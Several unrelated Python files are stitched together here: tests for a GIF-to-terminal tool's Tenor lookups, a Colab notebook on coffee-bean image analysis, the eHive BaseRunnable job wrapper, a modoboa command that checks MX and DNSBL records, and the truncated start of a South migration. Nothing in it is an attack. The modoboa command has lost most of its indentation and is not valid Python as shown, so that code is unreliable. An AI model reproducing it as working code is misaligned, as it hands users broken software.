        self.im.putpixel((3, 1,), color2)
        out = get_avg_for_em(self.px, 0, 0, 2, 2)
        self.assertColor(out, list(color1))
        out = get_avg_for_em(self.px, 2, 0, 2, 2)
        self.assertColor(out, self.gray)
        out = get_avg_for_em(self.px, 0, 2, 2, 2)
        self.assertColor(out, self.black)
        out = get_avg_for_em(self.px, 2, 2, 2, 2)
        self.assertColor(out, self.black)
@patch('os.path.exists')
@patch('gif_for_cli.generate.utils.requests')
class TestProcessInputSource(unittest.TestCase):
    """Tests for process_input_source().

    NOTE: class-level @patch decorators apply to every test method, and the
    mocks are injected bottom-up, so each test's signature is
    (self, mock_requests, mock_exists) — the reverse of the decorator order.
    """
    def set_mock_response(self, mock_requests, data, side_effect=False):
        # Helper: mock_requests.get() returns a response whose .json()
        # either returns `data`, or (side_effect=True) raises/calls it.
        mock_response = Mock()
        if side_effect:
            mock_response.json.side_effect = data
        else:
            mock_response.json.return_value = data
        mock_requests.get.return_value = mock_response
    def test_file(self, mock_requests, mock_exists):
        # Existing local file: passed through untouched, no network call.
        mock_exists.return_value = True
        input_source = 'foo.gif'
        processed_input_source = process_input_source(input_source, api_key)
        self.assertEqual(processed_input_source, input_source)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 0)
    def test_http_url(self, mock_requests, mock_exists):
        # Plain http:// URL: passed through untouched.
        mock_exists.return_value = False
        input_source = 'http://example.com/foo.gif'
        processed_input_source = process_input_source(input_source, api_key)
        self.assertEqual(processed_input_source, input_source)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 0)
    def test_https_url(self, mock_requests, mock_exists):
        # Plain https:// URL: passed through untouched.
        mock_exists.return_value = False
        input_source = 'https://example.com/foo.gif'
        processed_input_source = process_input_source(input_source, api_key)
        self.assertEqual(processed_input_source, input_source)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 0)
    def test_tenor_trending(self, mock_requests, mock_exists):
        # Empty input: resolved via the Tenor API to the first result's mp4.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, gif_response)
        input_source = ''
        processed_input_source = process_input_source(input_source, api_key)
        mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
        self.assertEqual(processed_input_source, mpr_url)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_search(self, mock_requests, mock_exists):
        # Free-text input: treated as a Tenor search query.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, gif_response)
        input_source = 'happy birthday'
        processed_input_source = process_input_source(input_source, api_key)
        mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
        self.assertEqual(processed_input_source, mpr_url)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_search_empty_results(self, mock_requests, mock_exists):
        # Search with no results: raises "Could not find GIF."
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, empty_gif_response)
        input_source = 'happy birthday'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'Could not find GIF.')
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_id(self, mock_requests, mock_exists):
        # All-digit input: treated as a Tenor GIF id lookup.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, gif_response)
        input_source = '11313704'
        processed_input_source = process_input_source(input_source, api_key)
        mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
        self.assertEqual(processed_input_source, mpr_url)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_id_error_occurred(self, mock_requests, mock_exists):
        # API payload containing an "error" key is surfaced to the caller.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, {'error': 'some error'})
        input_source = '11313704'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'An error occurred: some error')
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_id_empty_json(self, mock_requests, mock_exists):
        # Empty JSON payload: treated as "Could not find GIF."
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, {})
        input_source = '11313704'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'Could not find GIF.')
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_id_exception_when_getting_json(self, mock_requests, mock_exists):
        # Arbitrary exception from .json() propagates unchanged.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, Exception('some error'), side_effect=True)
        input_source = '11313704'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'some error')
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_id_json_decode_error(self, mock_requests, mock_exists):
        # Malformed JSON body is reported as a server error.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, lambda *args: json.loads('<'), side_effect=True)
        input_source = '11313704'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'A server error occurred.')
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_gif_url(self, mock_requests, mock_exists):
        # tenor.com view URL ending in an id: resolved via the API.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, gif_response)
        input_source = 'https://tenor.com/view/the-matrix-gif-5437241'
        processed_input_source = process_input_source(input_source, api_key)
        mpr_url = gif_response['results'][0]['media'][0]['mp4']['url']
        self.assertEqual(processed_input_source, mpr_url)
        self.assertEqual(mock_exists.call_count, 1)
        self.assertEqual(mock_requests.get.call_count, 1)
    def test_tenor_broken_gif_url(self, mock_requests, mock_exists):
        # tenor.com URL with no trailing id: rejected before any lookup.
        mock_exists.return_value = False
        self.set_mock_response(mock_requests, gif_response)
        input_source = 'https://tenor.com/view/the-matrix-gif'
        with self.assertRaises(Exception) as cm:
            process_input_source(input_source, api_key)
        self.assertEqual(cm.exception.args[0], 'Bad GIF URL.')
        self.assertEqual(mock_exists.call_count, 0)
        self.assertEqual(mock_requests.get.call_count, 0)
|
# -*- coding: utf-8 -*-
"""octavemagic_extension.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1gKkzdaVQHmGNAQhh0IXG_LO4Mmk9vooC
# Coffee Bean Health Detection using Octave in ipynb.
## Installation
"""
# Install GNU Octave, its development headers and the oct2py bridge.
# NOTE(review): the `!` lines are Colab/IPython shell magics — this file is
# an exported notebook and is not importable as plain Python.
!apt-get update
!apt install octave
# Commented out IPython magic to ensure Python compatibility.
!apt-get install liboctave-dev
!pip install oct2py
# %reload_ext oct2py.ipython
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# pkg install -forge image
# pkg load image
"""## Overview
When using the cell magic, `%%octave` (note the double `%`), multiple lines of Octave can be executed together. Unlike
with the single-line magic, no value is returned, so we use the `-i` and `-o` flags to specify input and output variables. Also note the use of the semicolon to suppress the Octave output.
## Imaging
Image output is automatically captured and displayed, and using the `-f` flag you may choose its format (currently, `png` and `svg` are supported).
The width or the height can be specified to constrain the image while maintaining the original aspect ratio.
Multiple figures can be drawn. Note that when using imshow the image will be created as a PNG with the raw
image dimensions.
Plots can be drawn inline (default) or bring up the Octave plotting GUI by using the -g (or --gui) flag:
"""
import requests
# Download the sample coffee-bean photo used by the Octave cells below.
img_data = requests.get('https://i.ibb.co/hd7gxky/IMG-5694.jpg').content
with open('coffee.jpg', 'wb') as handler:
    handler.write(img_data)
from google.colab import drive
drive.mount('/content/gdrive')
# NOTE(review): each `!` command runs in its own subshell, so this `!cd`
# does not change the notebook's working directory for later cells.
!cd gdrive
!ls
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 1200,400 -f png
# a = imshow('coffee.jpg')
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# bw_img = rgb2gray(imread('coffee.jpg'));
# figure
# imshow(bw_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# bin_img = imclearborder(imcomplement(im2bw(rgb2gray(imread('coffee.jpg')),0.5)));
# figure
# imshow(bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# I = max (phantom (), 0);
# figure; imshow (bw_img);
# title ("Original image");
# h = imhist (bw_img);
# t = otsuthresh (h);
# J = im2bw (imsmooth(bw_img, "Gaussian"));
# figure; imshow (J);
# title_line = sprintf ("Black and white image after thresholding, t=%g",
# t*255);
# title (title_line);
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# new_bin_img = imclearborder(imcomplement(J));
# figure
# imshow(new_bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# thresharea = bwarea(bin_img)
#
# otsuarea = bwarea(new_bin_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# c = [1,12,146,410];
# r = [1,104,156,129];
# pixels = impixel(imread('coffee.jpg'),c,r)
# for i = 1:rows(pixels)
# disp(pixels(i,1)+pixels(i,2)+pixels(i,3))
# endfor
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# dil_img = imdilate(imdilate(imdilate(bin_img,[1,1,1]),[1,1,1]),[1,1,1]);
# figure
# imshow(dil_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# erod_img = imerode(dil_img,[1,1,1]);
# figure
# imshow(erod_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave -s 600,200 -f png
# imshow(dil_img-erod_img)
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# whos a
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Sobel"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Roberts"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# t=imshow(edge(bw_img, "Prewitt"))
# Commented out IPython magic to ensure Python compatibility.
# %%octave
# k=imhist(g)
# length(k)
# Train a fastai CNN classifier over the coffee-bean image folders.
# NOTE(review): the bare `cd`/`ls` lines rely on IPython "automagic" and
# are invalid in plain Python; this section only runs inside a notebook.
!pip install fastai
!ls
from google.colab import drive
drive.mount('/content/drive')
from fastai.vision import *
path = Path('/content/drive/My Drive/dip paper')
folder = ['Defected coffee beans', 'Mixed coffee beans ', 'Perfect coffee beans']
files = [x + '-coffee.csv' for x in folder]
cd drive
cd My\ Drive
cd dip\ paper
ls
# Ensure one destination directory per class folder exists.
for x in folder:
  path1 = Path('./')
  dest = path1/x
  dest.mkdir(parents=True, exist_ok=True)
classes = ['inferior_batch', 'mediocre_batch', 'superior_batch']
np.random.seed(42)
data = ImageDataBunch.from_folder(path, train=".", valid_pct=0.2,
        ds_tfms=get_transforms(), size=150, num_workers=4).normalize(imagenet_stats)
data.classes
data.show_batch(rows=3, figsize=(7,8))
# NOTE(review): the second cnn_learner call discards the resnet50 learner
# and trains resnet34 instead — presumably an experiment; confirm intent.
learn = cnn_learner(data, models.resnet50, metrics=accuracy)
learn = cnn_learner(data, models.resnet34, metrics=accuracy)
learn.fit_one_cycle(2)
learn.fit_one_cycle(5, max_lr=slice(1e-4,1e-3))
learn.predict(data.test_dl)
interp = ClassificationInterpretation.from_learner(learn)
interp.plot_confusion_matrix()
# Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
# Copyright [2016-2021] EMBL-European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module mainly implements python's counterpart of GuestProcess. Read
the later for more information about the JSON protocol used to communicate.
"""
import json
import os
import sys
import traceback
import unittest
import warnings
from . import params
__version__ = "5.0"
class Job:
    """Plain attribute holder describing the current eHive job."""
class CompleteEarlyException(Exception):
    """Raised by a BaseRunnable subclass to signal an early *successful* end."""
class JobFailedException(Exception):
    """Raised by a BaseRunnable subclass to signal an early *unsuccessful* end."""
class HiveJSONMessageException(Exception):
    """Raised when the JSON message coming from GuestProcess cannot be parsed."""
class LostHiveConnectionException(Exception):
    """Raised when the communication pipe with the Perl side has been lost."""
class BaseRunnable:
    """This is the counterpart of GuestProcess. Note that most of the methods
    are private to be hidden in the derived classes.
    This class can be used as a base-class for people to redefine fetch_input(),
    run() and/or write_output() (and/or pre_cleanup(), post_cleanup()).
    Jobs are supposed to raise CompleteEarlyException in case they complete before
    reaching. They can also raise JobFailedException to indicate a general failure
    """
    # Private BaseRunnable interface
    #################################
    def __init__(self, read_fileno, write_fileno, debug):
        # We need the binary mode to disable the buffering
        self.__read_pipe = os.fdopen(read_fileno, mode='rb', buffering=0)
        self.__write_pipe = os.fdopen(write_fileno, mode='wb', buffering=0)
        self.__pid = os.getpid()
        self.debug = debug
        # NOTE: the constructor blocks here and runs the whole message loop.
        self.__process_life_cycle()
    def __print_debug(self, *args):
        # Debug trace to stderr, only at debug level > 1.
        if self.debug > 1:
            print("PYTHON {0}".format(self.__pid), *args, file=sys.stderr)
    # FIXME: we can probably merge __send_message and __send_response
    def __send_message(self, event, content):
        """serializes the message in JSON and send it to the parent process"""
        def default_json_encoder(o):
            # Fallback for values json cannot encode natively.
            self.__print_debug("Cannot serialize {0} (type {1}) in JSON".format(o, type(o)))
            return 'UNSERIALIZABLE OBJECT'
        j = json.dumps({'event': event, 'content': content}, indent=None, default=default_json_encoder)
        self.__print_debug('__send_message:', j)
        # UTF8 encoding has never been tested. Just hope it works :)
        try:
            self.__write_pipe.write(bytes(j+"\n", 'utf-8'))
        except BrokenPipeError:
            raise LostHiveConnectionException("__write_pipe") from None
    def __send_response(self, response):
        """Sends a response message to the parent process"""
        self.__print_debug('__send_response:', response)
        # Like above, UTF8 encoding has never been tested. Just hope it works :)
        try:
            self.__write_pipe.write(bytes('{"response": "' + str(response) + '"}\n', 'utf-8'))
        except BrokenPipeError:
            raise LostHiveConnectionException("__write_pipe") from None
    def __read_message(self):
        """Read a message from the parent and parse it"""
        try:
            self.__print_debug("__read_message ...")
            l = self.__read_pipe.readline()
            self.__print_debug(" ... -> ", l[:-1].decode())
            return json.loads(l.decode())
        except BrokenPipeError:
            raise LostHiveConnectionException("__read_pipe") from None
        except ValueError as e:
            # HiveJSONMessageException is a more meaningful name than ValueError
            raise HiveJSONMessageException from e
    def __send_message_and_wait_for_OK(self, event, content):
        """Send a message and expects a response to be 'OK'"""
        self.__send_message(event, content)
        response = self.__read_message()
        if response['response'] != 'OK':
            raise HiveJSONMessageException("Received '{0}' instead of OK".format(response))
    def __process_life_cycle(self):
        """Simple loop: wait for job parameters, do the job's life-cycle"""
        self.__send_message_and_wait_for_OK('VERSION', __version__)
        self.__send_message_and_wait_for_OK('PARAM_DEFAULTS', self.param_defaults())
        self.__created_worker_temp_directory = None
        while True:
            self.__print_debug("waiting for instructions")
            config = self.__read_message()
            # A message with no 'input_job' key is the shutdown signal.
            if 'input_job' not in config:
                self.__print_debug("no params, this is the end of the wrapper")
                return
            self.__job_life_cycle(config)
    def __job_life_cycle(self, config):
        """Job's life-cycle. See GuestProcess for a description of the protocol to communicate with the parent"""
        self.__print_debug("__life_cycle")
        # Parameters
        self.__params = params.ParamContainer(config['input_job']['parameters'], self.debug > 1)
        # Job attributes
        self.input_job = Job()
        for x in ['dbID', 'input_id', 'retry_count']:
            setattr(self.input_job, x, config['input_job'][x])
        self.input_job.autoflow = True
        self.input_job.lethal_for_worker = False
        self.input_job.transient_error = True
        # Worker attributes
        self.debug = config['debug']
        # Which methods should be run
        steps = [ 'fetch_input', 'run' ]
        if self.input_job.retry_count > 0:
            # Retried jobs get a chance to clean up the previous attempt.
            steps.insert(0, 'pre_cleanup')
        if config['execute_writes']:
            steps.append('write_output')
            steps.append('post_healthcheck')
        self.__print_debug("steps to run:", steps)
        self.__send_response('OK')
        # The actual life-cycle
        died_somewhere = False
        try:
            for s in steps:
                self.__run_method_if_exists(s)
        except CompleteEarlyException as e:
            # Early *successful* end: report it as a non-error warning.
            self.warning(e.args[0] if len(e.args) else repr(e), False)
        except LostHiveConnectionException as e:
            # Nothing we can do, let's just exit
            raise
        except Exception as e:
            died_somewhere = True
            self.warning( self.__traceback(e, 2), True)
        # post_cleanup always runs, even after a failure above.
        try:
            self.__run_method_if_exists('post_cleanup')
        except LostHiveConnectionException as e:
            # Nothing we can do, let's just exit
            raise
        except Exception as e:
            died_somewhere = True
            self.warning( self.__traceback(e, 2), True)
        job_end_structure = {'complete' : not died_somewhere, 'job': {}, 'params': {'substituted': self.__params.param_hash, 'unsubstituted': self.__params.unsubstituted_param_hash}}
        for x in [ 'autoflow', 'lethal_for_worker', 'transient_error' ]:
            job_end_structure['job'][x] = getattr(self.input_job, x)
        self.__send_message_and_wait_for_OK('JOB_END', job_end_structure)
    def __run_method_if_exists(self, method):
        """method is one of "pre_cleanup", "fetch_input", "run", "write_output", "post_cleanup".
        We only call the method if it exists to save a trip to the database."""
        if hasattr(self, method):
            self.__send_message_and_wait_for_OK('JOB_STATUS_UPDATE', method)
            getattr(self, method)()
    def __traceback(self, exception, skipped_traces):
        """Remove "skipped_traces" lines from the stack trace (the eHive part)"""
        s1 = traceback.format_exception_only(type(exception), exception)
        l = traceback.extract_tb(exception.__traceback__)[skipped_traces:]
        s2 = traceback.format_list(l)
        return "".join(s1+s2)
    # Public BaseRunnable interface
    ################################
    def warning(self, message, is_error = False):
        """Store a message in the log_message table with is_error indicating whether the warning is actually an error or not"""
        self.__send_message_and_wait_for_OK('WARNING', {'message': message, 'is_error': is_error})
    def dataflow(self, output_ids, branch_name_or_code = 1):
        """Dataflows the output_id(s) on a given branch (default 1). Returns whatever the Perl side returns"""
        if branch_name_or_code == 1:
            # Explicit flow on branch 1 disables the implicit autoflow.
            self.input_job.autoflow = False
        self.__send_message('DATAFLOW', {'output_ids': output_ids, 'branch_name_or_code': branch_name_or_code, 'params': {'substituted': self.__params.param_hash, 'unsubstituted': self.__params.unsubstituted_param_hash}})
        return self.__read_message()['response']
    def worker_temp_directory(self):
        """Returns the full path of the temporary directory created by the worker.
        """
        # Lazily requested once from the parent, then cached for the worker.
        if self.__created_worker_temp_directory is None:
            self.__send_message('WORKER_TEMP_DIRECTORY', None)
            self.__created_worker_temp_directory = self.__read_message()['response']
        return self.__created_worker_temp_directory
    # Param interface
    ##################
    def param_defaults(self):
        """Returns the defaults parameters for this runnable"""
        return {}
    def param_required(self, param_name):
        """Returns the value of the parameter "param_name" or raises an exception
        if anything wrong happens or the value is None. The exception is
        marked as non-transient."""
        # transient_error stays False if an exception escapes, which marks
        # the failure as non-transient; it is restored only on success.
        t = self.input_job.transient_error
        self.input_job.transient_error = False
        v = self.__params.get_param(param_name)
        if v is None:
            raise params.NullParamException(param_name)
        self.input_job.transient_error = t
        return v
    def param(self, param_name, *args):
        """When called as a setter: sets the value of the parameter "param_name".
        When called as a getter: returns the value of the parameter "param_name".
        It does not raise an exception if the parameter (or another one in the
        substitution stack) is undefined"""
        # As a setter
        if len(args):
            return self.__params.set_param(param_name, args[0])
        # As a getter
        try:
            return self.__params.get_param(param_name)
        except KeyError as e:
            warnings.warn("parameter '{0}' cannot be initialized because {1} is missing !".format(param_name, e), params.ParamWarning, 2)
            return None
    def param_exists(self, param_name):
        """Returns True if the parameter exists and can be successfully
        substituted, None if the substitution fails, False if it is missing"""
        if not self.__params.has_param(param_name):
            return False
        try:
            self.__params.get_param(param_name)
            return True
        except KeyError:
            return None
    def param_is_defined(self, param_name):
        """Returns True if the parameter exists and can be successfully
        substituted to a defined value, None if the substitution fails,
        False if it is missing or evaluates as None"""
        e = self.param_exists(param_name)
        if not e:
            # False or None
            return e
        try:
            return self.__params.get_param(param_name) is not None
        except KeyError:
            return False
class BaseRunnableTestCase(unittest.TestCase):
    """Unit tests for the param accessors of BaseRunnable, driven through a
    fake subclass that bypasses the pipe-based constructor."""
    def test_job_param(self):
        class FakeRunnableWithParams(BaseRunnable):
            # Minimal constructor: only sets up the param container and a
            # bare Job, skipping BaseRunnable.__init__ (pipes, life-cycle).
            def __init__(self, d):
                self._BaseRunnable__params = params.ParamContainer(d)
                self.input_job = Job()
                self.input_job.transient_error = True
        j = FakeRunnableWithParams({
            'a': 3,
            'b': None,
            'c': '#other#',        # substitution of an undefined parameter
            'e': '#e#'             # self-referencing substitution loop
        })
        # param_exists
        self.assertIs( j.param_exists('a'), True, '"a" exists' )
        self.assertIs( j.param_exists('b'), True, '"b" exists' )
        self.assertIs( j.param_exists('c'), None, '"c"\'s existence is unclear' )
        self.assertIs( j.param_exists('d'), False, '"d" doesn\'t exist' )
        with self.assertRaises(params.ParamInfiniteLoopException):
            j.param_exists('e')
        # param_is_defined
        self.assertIs( j.param_is_defined('a'), True, '"a" is defined' )
        self.assertIs( j.param_is_defined('b'), False, '"b" is not defined' )
        self.assertIs( j.param_is_defined('c'), None, '"c"\'s defined-ness is unclear' )
        self.assertIs( j.param_is_defined('d'), False, '"d" is not defined (it doesn\'t exist)' )
        with self.assertRaises(params.ParamInfiniteLoopException):
            j.param_is_defined('e')
        # param
        self.assertIs( j.param('a'), 3, '"a" is 3' )
        self.assertIs( j.param('b'), None, '"b" is None' )
        with self.assertWarns(params.ParamWarning):
            self.assertIs( j.param('c'), None, '"c"\'s value is unclear' )
        with self.assertWarns(params.ParamWarning):
            self.assertIs( j.param('d'), None, '"d" is not defined (it doesn\'t exist)' )
        with self.assertRaises(params.ParamInfiniteLoopException):
            j.param('e')
        # param_required
        self.assertIs( j.param_required('a'), 3, '"a" is 3' )
        with self.assertRaises(params.NullParamException):
            j.param_required('b')
        with self.assertRaises(KeyError):
            j.param_required('c')
        with self.assertRaises(KeyError):
            j.param_required('d')
        with self.assertRaises(params.ParamInfiniteLoopException):
            j.param_required('e')
|
<gh_stars>0
"""Management command to check defined domains."""
from datetime import datetime
from datetime import timedelta
import ipaddress
import dns.resolver
import gevent
from gevent import socket
from django.conf import settings
from django.core.management.base import BaseCommand
from django.template.loader import render_to_string
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils import timezone
from modoboa.admin import constants
from modoboa.admin import models
from modoboa.lib import email_utils
from modoboa.parameters import tools as param_tools
class CheckMXRecords(BaseCommand):
"""Command class."""
help = "Check defined domains."
@cached_property
def providers(self):
"""Return a list of DNSBL providers."""
if not hasattr(settings, "DNSBL_PROVIDERS"):
return constants.DNSBL_PROVIDERS
return settings.DNSBL_PROVIDERS
    @cached_property
    def sender(self):
        """Return sender address for notifications."""
        # Configured under the "core" application's global parameters.
        return param_tools.get_global_parameter("sender_address", app="core")
@cached_property
def valid_mxs(self):
"""Return valid MXs set in admin."""
valid_mxs = param_tools.get_global_parameter("valid_mxs")
return [ipaddress.ip_network(u"{}".format(v.strip()))
for v in valid_mxs.split() if v.strip()]
def add_arguments(self, parser):
"""Add extra arguments to command."""
parser.add_argument(
"--no-dnsbl", action="store_true", default=False,
help="Skip DNSBL queries.")
parser.add_argument(
"--email", type=str, action="append", default=[],
help="One or more email to notify")
parser.add_argument(
"--skip-admin-emails", action="store_true",
default=False,
help="Skip domain's admins email notification.")
parser.add_argument(
"--domain", type=str, action="append", default=[],
help="Domain name or id to update.")
parser.add_argument(
"--timeout", type=int, default=3,
help="Timeout used for queries.")
parser.add_argument(
"--ttl", type=int, default=7200,
help="TTL for dns query.")
def get_mx_records_for_domain(self, domain, ttl=7200):
"""Return one or more `models.MXRecord` for `domain`.
DNS queries are not performed while `ttl` (in seconds) is still valid.
"""
now = timezone.now()
records = models.MXRecord.objects.filter(domain=domain,
updated__gt=now)
if records.exists():
for record in records:
yield record
raise StopIteration()
models.MXRecord.objects.filter(domain=domain).delete()
try:
answers = dns.resolver.query(domain.name, "MX")
except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN,
dns.resolver.NoNameservers):
raise StopIteration()
delta = timedelta(seconds=ttl)
for answer in answers:
try:
# work if .exchange is a name or IP
address = socket.gethostbyname(str(answer.exchange))
except socket.gaierror:
pass
else:
try:
# we must have a valid IP
address = ipaddress.ip_address(u"{}".format(address))
except ValueError:
pass
else:
record = models.MXRecord.objects.create(
domain=domain,
name=u"{}".format(str(answer.exchange).strip(".")),
address=u"{}".format(address),
updated=now + delta)
yield record
def query_dnsbl(self, mx_list, provider):
"""Check given IP against given DNSBL provider."""
results = {}
for mx in mx_list:
reverse = ".".join(reversed(mx.address.split(".")))
pattern = "{}.{}.".format(reverse, provider)
try:
results[mx] = socket.gethostbyname(pattern)
except socket.gaierror:
results[mx] = False
return provider, results
def store_dnsbl_result(self, domain, provider, results, **options):
"""Store DNSBL provider results for domain."""
alerts = {}
to_create = []
for mx in results.keys():
result = "" if not results[mx] else results[mx]
dnsbl_result = models.DNSBLResult.objects.filter(
domain=domain, provider=provider, mx=mx).first()
if dnsbl_result is None:
to_create.append(
models.DNSBLResult(
domain=domain, provider=provider, mx=mx,
status=result)
)
else:
if not dnsbl_result.status and result:
if domain not in alerts:
alerts[domain] = []
alerts[domain].append((provider, mx))
dnsbl_result.status = result
dnsbl_result.save()
models.DNSBLResult.objects.bulk_create(to_create)
if not alerts:
return
emails = options["email"]
if not options["skip_admin_emails"]:
emails.extend(
domain.admins.exclude(email="").values_list("email", flat=True)
)
if not len(emails):
return
content = render_to_string(
"admin/notifications/domain_in_dnsbl.html", {
"domain": domain, "alerts": alerts
})
subject = _("[modoboa] DNSBL issue(s) for domain {}").format(
domain.name)
for email in emails:
status, msg = email_utils.sendmail_simple(
self.sender, email,
subject=subject, content=content)
if not status:
print(msg)
def check_valid_mx(self, domain, mx_list, **options):
"""Check that domain's MX record exist.
If `valid_mx` is provided, retrieved MX records must be
contained in it.
"""
alerts = []
check = False
mxs = [(mx, ipaddress.ip_address(u"%s" % mx.address))
for mx in mx_list]
valid_mxs = self.valid_mxs
if not mxs:
alerts.append(_("Domain {} has no MX record").format(domain))
elif valid_mxs:
for subnet in valid_mxs:
for mx, addr in mxs:
if addr in subnet:
mx.managed = check = True
mx.save()
if check is False:
mx_names = [
"{0.name} ({0.address})".format(mx) for mx in mx_list]
alerts.append(
_("MX record for domain {0} is invalid: {1}").format(
domain, ", ".join(mx_names))
)
if not alerts:
return
emails = options["email"]
if not options["skip_admin_emails"]:
emails.extend(
domain.admins.exclude(email="").values_list("email", flat=True)
)
if not len(emails):
return
content = render_to_string(
"admin/notifications/domain_invalid_mx.html", {
"domain": domain, "alerts": alerts
})
subject = _("[modoboa] MX issue(s) for domain {}").format(
domain.name)
for email in emails:
status, msg = email_utils.sendmail_simple(
self.sender, email,
subject=subject, content=content)
if not status:
print(msg)
def check_domain(self, domain, timeout=3, ttl=7200, **options):
"""Check specified domain."""
mx_list = list(self.get_mx_records_for_domain(domain, ttl=ttl))
if param_tools.get_global_parameter("enable_mx_checks"):
self.check_valid_mx(domain, mx_list, **options)
condition = (
not param_tools.get_global_parameter("enable_dnsbl_checks") or
options["no_dnsbl"] is True)
if condition or not mx_list:
return
jobs = [
gevent.spawn(self.query_dnsbl, mx_list, provider)
for provider in self.providers]
gevent.joinall(jobs, timeout)
for job in jobs:
if not job.successful():
continue
provider, results = job.value
self.store_dnsbl_result(domain, provider, results, **options)
def handle(self, *args, **options):
"""Command entry point."""
# Remove deprecated records first
models.DNSBLResult.objects.exclude(
provider__in=self.providers).delete()
if options["domain"]:
domains = []
for domain in options["domain"]:
try:
if domain.isdigit():
domains.append(models.Domain.objects.get(pk=domain))
else:
domains.append(models.Domain.objects.get(name=domain))
except models.Domain.DoesNotExist:
pass
else:
domains = models.Domain.objects.filter(
enabled=True, enable_dns_checks=True)
options.pop("domain")
for domain in domains:
if domain.uses_a_reserved_tld:
continue
self.check_domain(domain, **options)
|
<filename>mls_api/migrations/0001_initial.py
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration for the ``mls_api`` app.

    ``forwards`` creates the Team, Player, GamePlayer, Competition, Game,
    Substitution, Goal (plus its ``assisted_by`` M2M join table) and
    Booking tables; ``backwards`` drops them in the same order. The
    ``models`` dict is South's frozen ORM snapshot — it must mirror the
    models at the time this migration was written and should not be
    edited by hand.
    """

    def forwards(self, orm):
        """Create all mls_api tables and their M2M join table."""
        # Adding model 'Team'
        db.create_table(u'mls_api_team', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
            ('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50)),
        ))
        db.send_create_signal(u'mls_api', ['Team'])
        # Adding model 'Player'
        db.create_table(u'mls_api_player', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('first_name', self.gf('django.db.models.fields.CharField')(max_length=64)),
            ('last_name', self.gf('django.db.models.fields.CharField')(max_length=64)),
